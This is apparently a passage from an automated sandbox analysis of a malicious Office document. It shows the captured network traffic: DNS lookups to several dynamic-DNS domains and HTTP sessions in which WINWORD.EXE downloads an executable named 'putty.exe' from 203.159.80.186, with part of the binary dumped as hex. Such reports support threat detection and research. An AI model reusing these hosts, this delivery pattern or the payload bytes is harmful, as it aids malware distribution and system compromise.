                                Aug 2, 2021 10:59:54.311697006 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311709881 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311727047 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311731100 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311738014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311753035 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311774015 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311764956 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311790943 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311794996 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311800003 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311817884 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311834097 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311841011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311841965 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311863899 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311875105 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311886072 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311901093 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311906099 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.311908960 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.311945915 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.313561916 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341093063 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341123104 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341144085 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341165066 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341166973 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341186047 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341198921 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341202974 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341207027 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341212988 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341232061 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341247082 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341253042 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341264963 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341274977 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341289997 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341295004 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341310024 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341315985 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341325998 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341337919 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341353893 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341358900 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341358900 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341381073 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341389894 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341403961 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341408014 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341425896 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341435909 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341447115 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341456890 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341468096 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341471910 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341489077 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341497898 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341511011 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341520071 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341531992 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341538906 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341552973 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341561079 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341577053 CEST8049165203.159.80.186192.168.2.22
                                Aug 2, 2021 10:59:54.341583967 CEST4916580192.168.2.22203.159.80.186
                                Aug 2, 2021 10:59:54.341598988 CEST8049165203.159.80.186192.168.2.22

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Aug 2, 2021 10:59:54.123145103 CEST5219753192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:54.167108059 CEST53521978.8.8.8192.168.2.22
                                Aug 2, 2021 10:59:57.598957062 CEST5309953192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:57.642354965 CEST53530998.8.8.8192.168.2.22
                                Aug 2, 2021 10:59:58.563791037 CEST5283853192.168.2.228.8.8.8
                                Aug 2, 2021 10:59:58.599704981 CEST53528388.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:28.612422943 CEST6120053192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:28.667654037 CEST53612008.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:29.524005890 CEST4954853192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:29.556768894 CEST53495488.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:29.557904005 CEST4954853192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:29.590831041 CEST53495488.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.130738020 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.262723923 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.263684988 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.298891068 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:00:55.299585104 CEST5562753192.168.2.228.8.8.8
                                Aug 2, 2021 11:00:55.334811926 CEST53556278.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.769011974 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:03.900093079 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.945925951 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:03.978482962 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:03.992775917 CEST5600953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:04.025501013 CEST53560098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:10.201478958 CEST6186553192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:10.237142086 CEST53618658.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.511684895 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.549159050 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.592659950 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.629231930 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:15.686260939 CEST5517153192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:15.724112988 CEST53551718.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:26.042512894 CEST5249653192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:26.079297066 CEST53524968.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:26.163316965 CEST5249653192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:26.191297054 CEST53524968.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:31.131093025 CEST5756453192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:31.158580065 CEST53575648.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:36.336036921 CEST6300953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:36.371905088 CEST53630098.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:41.617649078 CEST5931953192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:41.650404930 CEST53593198.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:52.811868906 CEST5307053192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:52.841140032 CEST53530708.8.8.8192.168.2.22
                                Aug 2, 2021 11:01:58.229518890 CEST5977053192.168.2.228.8.8.8
                                Aug 2, 2021 11:01:58.264827013 CEST53597708.8.8.8192.168.2.22
                                Aug 2, 2021 11:02:03.448385954 CEST6152353192.168.2.228.8.8.8
                                Aug 2, 2021 11:02:03.577531099 CEST53615238.8.8.8192.168.2.22

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Aug 2, 2021 10:59:54.123145103 CEST192.168.2.228.8.8.80x6029Standard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:57.598957062 CEST192.168.2.228.8.8.80xe5d1Standard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:58.563791037 CEST192.168.2.228.8.8.80x5cccStandard query (0)newhosteeeee.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:28.612422943 CEST192.168.2.228.8.8.80xe21Standard query (0)sdafsdffssffs.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.524005890 CEST192.168.2.228.8.8.80xe89aStandard query (0)hutyrtit.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.557904005 CEST192.168.2.228.8.8.80xe89aStandard query (0)hutyrtit.ydns.euA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.130738020 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.263684988 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.299585104 CEST192.168.2.228.8.8.80x27e1Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.769011974 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.945925951 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.992775917 CEST192.168.2.228.8.8.80x566aStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:10.201478958 CEST192.168.2.228.8.8.80x12ebStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.511684895 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.592659950 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.686260939 CEST192.168.2.228.8.8.80xcc8cStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.042512894 CEST192.168.2.228.8.8.80x5b8fStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.163316965 CEST192.168.2.228.8.8.80x5b8fStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:31.131093025 CEST192.168.2.228.8.8.80xb6e4Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:36.336036921 CEST192.168.2.228.8.8.80x7ae6Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:41.617649078 CEST192.168.2.228.8.8.80xe8bfStandard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:52.811868906 CEST192.168.2.228.8.8.80xd6d2Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:58.229518890 CEST192.168.2.228.8.8.80x4853Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)
                                Aug 2, 2021 11:02:03.448385954 CEST192.168.2.228.8.8.80xf096Standard query (0)hhjhtggfr.duckdns.orgA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Aug 2, 2021 10:59:54.167108059 CEST8.8.8.8192.168.2.220x6029No error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:57.642354965 CEST8.8.8.8192.168.2.220xe5d1No error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 10:59:58.599704981 CEST8.8.8.8192.168.2.220x5cccNo error (0)newhosteeeee.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:28.667654037 CEST8.8.8.8192.168.2.220xe21No error (0)sdafsdffssffs.ydns.eu203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.556768894 CEST8.8.8.8192.168.2.220xe89aNo error (0)hutyrtit.ydns.eu203.159.80.165A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:29.590831041 CEST8.8.8.8192.168.2.220xe89aNo error (0)hutyrtit.ydns.eu203.159.80.165A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.262723923 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.298891068 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:00:55.334811926 CEST8.8.8.8192.168.2.220x27e1No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.900093079 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:03.978482962 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:04.025501013 CEST8.8.8.8192.168.2.220x566aNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:10.237142086 CEST8.8.8.8192.168.2.220x12ebNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.549159050 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.629231930 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:15.724112988 CEST8.8.8.8192.168.2.220xcc8cNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.079297066 CEST8.8.8.8192.168.2.220x5b8fNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:26.191297054 CEST8.8.8.8192.168.2.220x5b8fNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:31.158580065 CEST8.8.8.8192.168.2.220xb6e4No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:36.371905088 CEST8.8.8.8192.168.2.220x7ae6No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:41.650404930 CEST8.8.8.8192.168.2.220xe8bfNo error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:52.841140032 CEST8.8.8.8192.168.2.220xd6d2No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:01:58.264827013 CEST8.8.8.8192.168.2.220x4853No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)
                                Aug 2, 2021 11:02:03.577531099 CEST8.8.8.8192.168.2.220xf096No error (0)hhjhtggfr.duckdns.org203.159.80.186A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • newhosteeeee.ydns.eu
                                • hutyrtit.ydns.eu

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249165203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:54.220050097 CEST0OUTGET /putty.exe HTTP/1.1
                                Accept: */*
                                UA-CPU: AMD64
                                Accept-Encoding: gzip, deflate
                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:54.251251936 CEST2INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:54 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELFaP z; @@ @(;O@` H.text` `.rsrc@"@@.reloc`(@B\;H w0(+(,(o-*(.(/(0(1(2*N(o(3*&(4*s5s6s7s8s9*0~o:+*0~o;+*0~o<+*0~o=+*0~o>+*0<~(?,!rp(@oAsB~+*0~+*"*0&(r?p~oC(Dt%+*s(Ets


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.2249166203.159.80.18680C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                TimestampkBytes transferredDirectionData
                                Aug 2, 2021 10:59:57.762746096 CEST778OUTGET /putty.exe HTTP/1.1
                                Host: newhosteeeee.ydns.eu
                                Connection: Keep-Alive
                                Aug 2, 2021 10:59:57.833343983 CEST779INHTTP/1.1 200 OK
                                Content-Type: application/octet-stream
                                Last-Modified: Sun, 01 Aug 2021 22:25:10 GMT
                                Accept-Ranges: bytes
                                ETag: "6ca734172487d71:0"
                                Server: Microsoft-IIS/8.5
                                Date: Mon, 02 Aug 2021 08:59:57 GMT
                                Content-Length: 731648
                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 46 1f 07 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 20 0b 00 00 08 00 00 00 00 00 00 7a 3b 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 3b 0b 00 4f 00 00 00 00 40 0b 00 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 60 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 3b 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 00 f2 00 00 08 d2 02 00 03 00 00 00 01 00 00 06 08 c4 03 00 20 77 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 2b 00 00 0a 28 2c 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 2d 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 2e 00 00 0a 00 02 16 28 2f 00 00 0a 00 02 17 28 30 00 00 0a 00 02 17 28 31 00 00 0a 00 02 16 28 32 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 17 02 00 06 28 33 00 00 0a 00 2a 26 00 02 28 34 00 00 0a 00 2a ce 73 35 00 00 0a 80 01 00 00 04 73 36 00 00 0a 80 02 00 00 04 73 37 00 00 0a 80 03 00 00 04 73 38 00 00 0a 80 04 00 00 04 73 39 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3a 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 3f 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 40 00 00 0a 6f 41 00 00 0a 73 42 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0b 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 43 00 00 0a 28 44 00 00 0a 0b 07 74 25 00 00 01 0a 2b 00 06 2a 92 73 10 00 00 06 28 45 00 00 0a 74 06 00 00 02 80 08 00 00 04 73
